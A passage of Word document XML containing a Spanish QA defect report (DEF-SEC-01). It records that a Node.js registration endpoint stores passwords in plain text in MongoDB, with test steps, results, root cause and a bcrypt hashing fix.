            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C55A11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Reportes Detallados de Defecto</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C55A11" w:sz="6"/>
          <w:left w:val="single" w:color="C55A11" w:sz="6"/>
          <w:bottom w:val="single" w:color="C55A11" w:sz="6"/>
          <w:right w:val="single" w:color="C55A11" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="C55A11" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardware y software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PC, 16GB RAM, Intel Core i5 · Node.js 20 · Jest v29 + Supertest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema operativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Navegador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resolución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1920x1080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Comentarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detectado en TC-SEC-01 — Seguridad OWASP A02 (Fallos Criptográficos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nombre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Contraseñas almacenadas en texto plano en MongoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /auth/register almacena la contraseña del usuario directamente en MongoDB sin aplicar ningún algoritmo de hash (bcrypt). Cualquier acceso a la base de datos expone las credenciales en texto claro.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Encargado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Andrés Gustavo Arias Ruiz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Prioridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Crítica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Backend corriendo en http://localhost:4000.
2. MongoDB en memoria (mongodb-memory-server).
3. Jest + Supertest activos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pasos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. POST /auth/register con { username:"sec01hash", email:"sec01hash@test.com", password:"Pass123!" }.
2. Consultar User.findOne({ email:"sec01hash@test.com" }) en MongoDB.
3. Verificar que user.password tenga formato bcrypt ($2b$).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">user.password comienza con "$2b$" (bcrypt). user.password !== "Pass123!".</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado obtenido</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">user.password === "Pass123!" (texto plano). No existe hash bcrypt. Test [DEF-SEC-01] FALLA con expect(received).toMatch(pattern).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Notas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Causa raíz: backend/routes/auth.js:108 guarda req.body.password directamente sin bcrypt.hash().
Archivo afectado: backend/routes/auth.js.
Correción: npm install bcrypt; const hash = await bcrypt.hash(password, 10); user.password = hash;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
